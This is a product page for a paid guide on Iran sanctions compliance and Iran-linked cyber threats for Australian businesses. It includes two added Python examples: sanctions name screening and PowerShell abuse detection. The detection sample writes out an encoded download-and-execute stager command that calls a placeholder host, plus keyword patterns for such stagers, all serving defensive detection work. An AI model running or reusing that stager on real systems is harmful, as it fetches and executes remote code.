Geopolitical Risk Guide
Last updated: 2026-03-25

Iran Sanctions & Cyber Risk Guide

Sanctions compliance checklist, Iran-linked cyber threat profiles, supply chain risk assessment, and board-level risk briefing templates for Australian businesses.

$47 AUD
Get Instant Access →

30-Day Money-Back Guarantee

Instant download · DFAT-aligned · Board-ready

What's Included

Comprehensive sanctions and cyber risk toolkit for Australian businesses.

Sanctions Compliance Checklist

Step-by-step checklist to verify your business complies with Australian and international Iran sanctions requirements.

Cyber Threat Profiles

Detailed profiles of Iran-linked threat actors targeting Australian businesses. Know what to look for.

Supply Chain Risk Assessment

Templates to assess your supply chain for Iran-linked exposure. Third-party risk evaluation made practical.

Incident Response for State Actors

What to do if you detect a state-sponsored intrusion. Step-by-step playbook aligned to Australian requirements.

Board-Level Risk Briefing

Ready-to-present risk briefing template. Communicate geopolitical cyber risk to non-technical leadership.

Australian Context

Written for Australian businesses. References DFAT sanctions list, ASD advisories, and local reporting requirements.

Who It's For

Board Members & Directors

Needing to understand and communicate geopolitical cyber risk to stakeholders.

Compliance & Risk Officers

Responsible for sanctions compliance and third-party risk management.

IT & Security Teams

Needing threat intelligence on state-sponsored actors targeting Australian infrastructure.

Businesses with Global Supply Chains

Any organisation with international suppliers, partners, or customers in sensitive regions.

Why This Matters

This is not a static risk. Between January and March 2026, OFAC issued General Licences GL T and GL U, the first substantive relaxation of Iran sanctions since 2018, while DFAT simultaneously tightened compliance expectations with mandatory 10-year record retention and expanded red-flag typologies. From 31 March 2026, AUSTRAC gains enforcement powers over sanctions-related financial activity. The AFP prosecution of a remittance-company director for transferring approximately $649,000 to sanctioned Iranian banks demonstrates that Australian authorities are actively pursuing criminal charges. Meanwhile, Iran-linked APT groups continue to exploit newly disclosed CVEs quickly and to run supply-chain compromise campaigns. The regulatory landscape is shifting fast, enforcement is intensifying, and businesses that treat this as a checkbox exercise are exposed. This guide gives you practical tools to assess your exposure, navigate the OFAC-DFAT compliance tension, and brief your board, all in an Australian context with current intelligence.

Latest Intelligence Update — March 2026

OFAC General Licences GL T and GL U (January-March 2026)

OFAC issued two new general licences that directly affect Australian businesses with a US nexus. GL T (effective 23 January 2026) authorises limited safety- and environmental-related transactions involving blocked persons or vessels. GL U (effective 20 March 2026) permits the delivery and sale of Iranian petroleum products under tightly defined conditions, marking the first substantive relaxation since the 2018 comprehensive restrictions. Australian firms that maintain USD-denominated accounts, use US-based payment processors, or rely on SWIFT must assess whether their Iran-related activities fall within these narrow licence scopes. Both licences carry a "no-new-business" clause, so only activity under pre-existing authorisation is covered; they do not open the door to new contracts or counterparties.

DFAT Guidance Overhaul and 10-Year Record Retention

DFAT released revised sanctions guidance introducing stricter red-flag typologies, expanding the scope of entities subject to compliance (including fintech firms and payment-service providers), and mandating a 10-year record-retention obligation for all sanctions-related documentation. This supersedes the previous 5-year standard and applies to exporters, banks, and payment processors. Critically, DFAT's precautionary posture creates a compliance grey area: an OFAC general licence only authorises conduct under US law and has no effect under Australian law, so a DFAT sanctions permit is still required for any dealing that Australian autonomous sanctions would otherwise prohibit, even where that dealing falls within GL T or GL U. Breaches attract civil penalties of up to USD 1 million per breach.

AUSTRAC Enforcement Powers (31 March 2026)

From 31 March 2026, AUSTRAC assumes limited enforcement powers over sanctions-related financial activity. This enables direct monitoring of, and penalties for, supply-chain financing involving Iranian counterparties. Australian fintech firms facilitating cross-border payments, including cryptocurrency transactions, face heightened regulatory scrutiny under both the AUSTRAC and DFAT frameworks. Businesses should anticipate audits and implement automated counterparty screening against the DFAT Consolidated List and, wherever there is a US nexus, the OFAC SDN list, with fuzzy matching so that transliteration variants and reordered names are not missed.
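The screening step above is the part a practitioner has to build or buy, so here is a minimal fuzzy name matcher as an added example. It is not code from the guide, and the list entries are constructed, fictional placeholders (the "EX-" identifiers and names are invented for illustration), not records from the DFAT Consolidated List or the OFAC SDN List. A real deployment loads the published lists and keeps the normalisation and scoring shown here; the 0.85 threshold is an assumption to be tuned against your own counterparty data.

```python
"""Fuzzy name screening against a sanctions-style list (added example).

The entries below are constructed, fictional placeholders, not records
from the DFAT Consolidated List or the OFAC SDN List.
"""
import re
import unicodedata
from difflib import SequenceMatcher

# Constructed, fictional entries: (reference id, primary name, aliases).
SAMPLE_LIST = [
    ("EX-0001", "Example Trading Company Limited", ["Example Trading Co.", "ETC Ltd"]),
    ("EX-0002", "Mohammad Reza Example", ["Mohammed R. Example"]),
    ("EX-0003", "Sample Petrochemical Industries", []),
]

# Corporate suffixes carry little identifying signal and inflate scores
# between unrelated companies, so they are dropped before comparison.
STOPWORDS = {"ltd", "limited", "co", "company", "inc", "llc", "corp",
             "corporation", "pty", "gmbh", "sa"}


def normalise(name: str) -> str:
    """Fold case, strip diacritics and punctuation, drop corporate suffixes,
    and sort the remaining tokens so that word order (surname first or
    last) does not affect the comparison."""
    ascii_name = unicodedata.normalize("NFKD", name).encode("ascii", "ignore").decode()
    tokens = re.sub(r"[^a-z0-9 ]+", " ", ascii_name.casefold()).split()
    return " ".join(sorted(t for t in tokens if t not in STOPWORDS))


def similarity(a: str, b: str) -> float:
    """Character-level similarity in [0, 1] between two normalised names."""
    return SequenceMatcher(None, a, b).ratio()


def screen(query: str, entries=SAMPLE_LIST, threshold: float = 0.85):
    """Return [(reference id, best score)] for every entry whose primary name
    or any alias scores at or above the threshold, best match first.
    A non-empty result is a potential hit that needs manual review."""
    q = normalise(query)
    hits = []
    for ref, primary, aliases in entries:
        best = max(similarity(q, normalise(n)) for n in (primary, *aliases))
        if best >= threshold:
            hits.append((ref, round(best, 3)))
    return sorted(hits, key=lambda hit: hit[1], reverse=True)


if __name__ == "__main__":
    for counterparty in ("EXAMPLE TRADING CO LTD", "Mohammed Reza Example",
                         "Sample Pétrochemical Industries", "Unrelated Widgets Pty Ltd"):
        print(f"{counterparty!r}: {screen(counterparty)}")
```

Sorting tokens is what lets "Example, Mohammad Reza" and "Mohammad Reza Example" score identically, and stripping diacritics is what keeps a transliterated spelling from slipping past the check. Lowering the threshold catches more variants at the cost of more manual reviews; record the threshold and list version used for each screening, since that is what an auditor will ask for.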

Active Threat Actors

Iran-linked APT groups are accelerating exploitation of newly disclosed CVEs, with campaigns observed using PowerShell-based execution vectors and supply-chain compromise techniques targeting software-update pipelines. These groups continue to target critical infrastructure, financial services, and government-adjacent organisations in allied nations, including Australia. The guide includes updated threat actor profiles, known TTPs, and indicators of compromise so that security teams can turn them into detections.
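As an added example of turning "PowerShell-based execution vectors" into a detection, the script below scores process-creation records for generic PowerShell abuse indicators (an encoded command that decodes to a download-and-execute stager, a hidden window, profile and execution-policy suppression). It is not code from the guide and is not tied to any specific actor profile. The records are constructed for illustration (fictional hosts and users, a stager URL under the reserved example.invalid domain), the "host|user|CommandLine" field layout is an assumption, and the indicator weights are a starting point rather than a vendor rule.

```python
"""Score PowerShell process launches for generic abuse indicators (added example).

The records below are constructed, not real telemetry. The field layout
"host|user|CommandLine" is an assumption; adapt the split to your log source.
"""
import base64
import re

# The encoded payload is built here so the sample runs offline.
# powershell.exe -EncodedCommand expects base64 of a UTF-16LE string.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    "ws01|alice|powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\build\\deploy.ps1",
    f"ws02|svc_update|powershell.exe -nop -w hidden -enc {_ENCODED}",
    "ws03|bob|C:\\Windows\\System32\\notepad.exe C:\\Users\\bob\\notes.txt",
    'ws04|carol|pwsh.exe -c "Get-ChildItem C:\\temp"',
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand, so match
# the common short forms as well as the full switch.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encoded(?:command)?)\s+([A-Za-z0-9+/=]{16,})")

# Content characteristic of download-and-execute stagers.
STAGER_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "frombase64string")

# Weighted indicators: one legitimate-looking switch alone should not page
# anyone, but an encoded stager launched with a hidden window should.
WEIGHTS = {"encoded command": 3, "stager content": 3, "hidden window": 2,
           "no profile": 1, "execution policy bypass": 1}
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(record: str):
    """Score one record; return a finding dict if it meets the alert threshold."""
    host, user, cmdline = record.split("|", 2)
    if not re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmdline.lower()):
        return None
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        if any(marker in decoded.lower() for marker in STAGER_MARKERS):
            reasons.append("stager content")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline):
        reasons.append("hidden window")
    if re.search(r"(?i)-nop(?:rofile)?\b", cmdline):
        reasons.append("no profile")
    if re.search(r"(?i)-e(?:p|xecutionpolicy)\s+bypass", cmdline):
        reasons.append("execution policy bypass")
    score = sum(WEIGHTS[r] for r in reasons)
    if score < ALERT_THRESHOLD:
        return None
    return {"host": host, "user": user, "score": score,
            "reasons": reasons, "decoded": decoded}


def scan(events):
    """Run analyse_event over every record and keep only the findings."""
    return [finding for finding in map(analyse_event, events) if finding]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']} score={f['score']} {f['reasons']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The build-server launch on ws01 uses -NoProfile and -ExecutionPolicy Bypass, which are common in legitimate deployment scripts, so it scores 2 and is not reported; the ws02 launch decodes to a WebClient stager and scores 9. Decoding the payload before matching is the important step, because the encoded form hides the URL and the cradle keywords from plain string rules.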

Cross-Jurisdictional Compliance Tension

A divergence has emerged between OFAC and DFAT interpretations. OFAC's GL T and GL U suggest a limited, case-by-case approach to permitted transactions, while DFAT adopts a more precautionary posture, warning that any indirect involvement with Iranian entities may trigger penalties. Because each regime applies independently, compliance with one does not discharge the other: multinational corporations operating across both jurisdictions must satisfy the stricter requirement at every step. The guide maps the overlap and provides a decision framework for dual-jurisdiction compliance.

Frequently Asked Questions

Is this guide specific to Australian sanctions law?
Yes. The guide references the DFAT Consolidated List, Australian autonomous sanctions legislation, and ASD cyber threat advisories. It is written for Australian businesses and references local reporting requirements.
Do I need a cybersecurity team to use the threat profiles?
No. The threat profiles are written in plain language for risk and compliance professionals. Technical indicators are included for IT teams, but the strategic overview is accessible to non-technical leadership and board members.
How current is the threat intelligence?
The guide covers established Iran-linked threat actor groups and their known tactics, techniques, and procedures. It is based on publicly available intelligence from ASD, CISA, and reputable threat intelligence sources. Purchasers receive updates when significant changes occur.
Can I present the board briefing template directly to directors?
Yes. The board-level risk briefing template is designed to be presentation-ready. It communicates geopolitical cyber risk in business terms, not technical jargon, and includes recommended actions for governance teams.
What are the latest Iran sanctions enforcement actions in Australia?
The guide covers the AFP prosecution of a remittance-company director charged with transferring approximately $649,000 to sanctioned Iranian banks. This case demonstrates that Australian authorities are actively enforcing sanctions violations with criminal charges. The guide analyses this case and its implications for compliance obligations under Australian autonomous sanctions legislation.
Does the guide cover Iran-linked cyber threat groups?
Yes. The guide includes detailed profiles of Iran-linked APT groups, their tactics, techniques, and procedures (TTPs), and known indicators of compromise. Coverage includes PowerShell-based execution vectors, CVE exploitation patterns, and supply-chain compromise campaigns targeting software-update pipelines. Profiles are written for both technical and non-technical audiences.
How do the new OFAC General Licences GL T and GL U affect Australian businesses?
GL T (effective January 2026) and GL U (effective March 2026) create narrow pathways for certain Iran-related transactions, but carry strict conditions including a "no-new-business" clause. Australian businesses with USD accounts, US payment processors, or SWIFT exposure must assess whether their activities fall within scope. The guide includes a decision framework for navigating these licences alongside DFAT requirements.
What does AUSTRAC's new enforcement role mean for my business?
From 31 March 2026, AUSTRAC gains limited enforcement powers over sanctions-related financial activity. This means direct monitoring and potential penalties for supply-chain financing involving Iranian counterparts. Fintech firms and payment-service providers face particular scrutiny. The guide covers the compliance steps needed before the enforcement date.
What is the new 10-year record-retention requirement?
DFAT's revised guidance mandates that all sanctions-related documentation be retained for 10 years, up from the previous 5-year standard. This applies to exporters, banks, payment processors, and any entity handling Iran-related transactions. The guide includes a record-retention checklist to help you meet this obligation.
What is the refund policy?
Full 30-day money-back guarantee. If the guide does not meet your needs, email us for a complete refund. No questions asked.

Ready to Assess Your Risk?

One-time purchase. Instant download. Start implementing today.

Get the Guide — $47 AUD →